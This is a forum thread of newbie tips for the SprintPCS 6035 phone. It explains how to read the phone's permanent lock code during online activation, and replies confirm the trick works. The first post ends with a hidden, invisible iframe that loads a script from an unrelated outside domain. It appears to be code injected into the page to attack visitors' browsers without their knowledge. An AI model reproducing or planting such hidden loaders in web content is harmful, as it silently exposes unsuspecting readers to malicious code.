+ Reply to Thread

Tips for 6035 Newbies

You can probably save yourself $10 [b:d605dfec1e]and[/b:d605dfec1e] easily learn your new SprintPCS 6035's unique lock codes by activating it online at: www.sprintpcs.com.

Here's how to get the automated system at SprintPCS to show you your phone's "secret" permanent lock code (i.e., so you can easily reprogram it to work on Verizon or Alltel later on, if ever desired):

(1) After SprintPCS's automated activation system tells you to enter 111111 (which you should do as instructed), it will then tell you to enter a unique 6 digit code, but DO NOT do so!

(2) Instead, you need to click on the box that says something like "I'm having a problem, and need to try an alternate method to activate my phone."

(3) The automated system will then tell you to enter a different 6 digit code (which is the phone's permanent, unique lock code). Just
    write down and save that second level (alternate) lock code before entering it and going on to complete the online activation process as instructed.

(It's also [i:d605dfec1e]possible[/i:d605dfec1e] to get a human being to give you the phone's lock code during an activation over a landline, but you HAVE TO convince him/her that the first code didn't work!)

GOOD LUCK!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Not Necessarily Too Good To Be True

RikkiM

Clarification

I think I got a look at my phone's permanent unlock code when I took it to have the firmware upgraded.

Sorry for the newbie question......

If I understand the instructions correctly from the previous post, I enter 111111, then the unlock code?

If I did it right, what screen comes up?

Thanks! :d

Sorry, but I don't know the answer to your question, RikkiM --

As I understand it, this "FAQ Entries" message board is a place to post early drafts of potential FAQs, hoping that constructive feedback and/or drafts of similar potential FAQs will be posted as replies.

The newbie tip which leads off this thread isn't really intended to guide a newbie through programming a 6035, except to point out how to learn your phone's lock code during the SprintPCS.com online activation process.

I think you may find some helpful info in Burval's Mini-How-To FAQ Entry Thread.

Something that might really be of use would be a FAQ for newbies which outlines what to do with thier 6035 in the first few days or weeks.

I know palm pilot, but I am mystified by all the web enablement stuff. I do not even know where to begin.

Capt...

Check out the Search engine. Kind of a do-it-yourself FAQ for the issues YOU are interested in!

Welcome to the board...it ROCKS!

Regards.

Dave

I Totally Agree, CaptKurt!

Exactly, CaptKurt!

That's what I meant this thread to be -- a collection of newbie tips.

Anyone else care to post a potential FAQ for newbies? (Please?)

RikkiM

The code works!

I followed the instructions and entered the code I saw when I took my phone in for two of three firmware updates.

The code is the one that unlocks my phone. :d

Now, I just have to remember it!

Josh

The Grail (so far)

I just created a document for newbies. It's too long for an email but I've submitted it to Bibi's site. I called it "Grail" and until Bibi moves it you can download it at:

http://24.201.26.57:8088/Palm/6035_files/incoming/

Let me know what you think.

Josh

Is there a way of finding out the lock code after I've already activated my phone?

I apologize in advance if this question has already been asked elseware.

Have pity on a n00b to this forum